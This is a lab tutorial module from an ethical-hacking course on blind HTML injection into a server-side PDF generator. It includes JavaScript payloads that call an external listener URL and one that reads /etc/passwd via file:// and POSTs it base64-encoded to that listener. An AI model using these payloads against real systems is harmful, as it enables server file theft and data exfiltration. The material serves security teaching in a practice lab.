Sometimes there may be a situation where you know that the application is executing HTML code, but either you cannot see the final PDF document or the input HTML code simply does not fit or appear visually in the right place in the document. In that case, blind injection must be performed and the data leaked through another route. Let's explore this in this module.
In this module, we will solve the lab together. If you wish, you can stop reading and attempt to solve it yourself. Otherwise, you can follow the steps below at your own pace.
Vulnerability Verification
The application is almost the same as in the previous module, with the exception that this time the application does not allow us to download the generated PDF file. We must therefore verify the vulnerability by other means.
This is where the Hakatemian listener tool fits best. Let's start by creating a new listener URL and writing JavaScript code that calls that URL. This way, we can verify two things.
- Is the use of JavaScript code allowed
- Is PDF generation happening in a system that we can communicate with the external network
Sometimes the HTTP request does not arrive, but DNS does. This may, for example, mean that there is a firewall in front that blocks the traffic. Typically, DNS is allowed. If neither the HTTP request nor the DNS traffic appears on the listener, it is recommended to try other HTML elements such as image and style resources. This will determine if the execution of JavaScript code is blocked.
We use the following code and place it in the comment field. After this, we send the profile for evaluation.
<script>
x=new XMLHttpRequest;
x.open("GET","https://z8u013a69c.hit.ha-listener.com");
x.send();
</script>We see hits in the listener and thus we have ensured that the application is vulnerable and allows the execution of JavaScript code. We can also communicate externally with JavaScript code.
Exploitation of vulnerability
The next step is to exploit the vulnerability and leak the passwd file from the system. This is a relatively straightforward action using JavaScript code and consists of the following steps.
- First, we retrieve the content of the file
- Then we send this to the listener
Our code looks something like this.
<script>
passwd_xhr=new XMLHttpRequest;
passwd_xhr.onload=function(){
var bs64 = btoa(this.responseText);
kuuntelija = new XMLHttpRequest;
kuuntelija.open("POST", "https://z8u013a69c.hit.ha-listener.com");
kuuntelija.send(bs64);
};
passwd_xhr.open("GET","file:///etc/passwd");
passwd_xhr.send();
</script>First, we fetch the content of the passwd file by making an XMLHttpRequest. We define a function for this (passwd_xhr.onload), which will be executed when the first request is complete. This function first encodes the content of the file using base64, and then sends it to the listener with another XMLHttpRequest request.
We sent the profile for evaluation and got a hit to the listener. The HTTP request contained a base64-encoded body, which we can now decode using Hakatemian's converter tool.
Incoming HTTP request to the listener.
Decoding base64-encoded data contained in the HTTP body in the transformer.
This is how we were able to leak the file even though we did not have access to the generated PDF file. Let's see in the next module how the situation is when outbound HTTP traffic is blocked to the outside world.
Ready to become an ethical hacker?
Start today.
As a member of Hakatemia you get unlimited access to Hakatemia modules, exercises and tools, and you get access to the Hakatemia Discord channel where you can ask for help from both instructors and other Hakatemia members.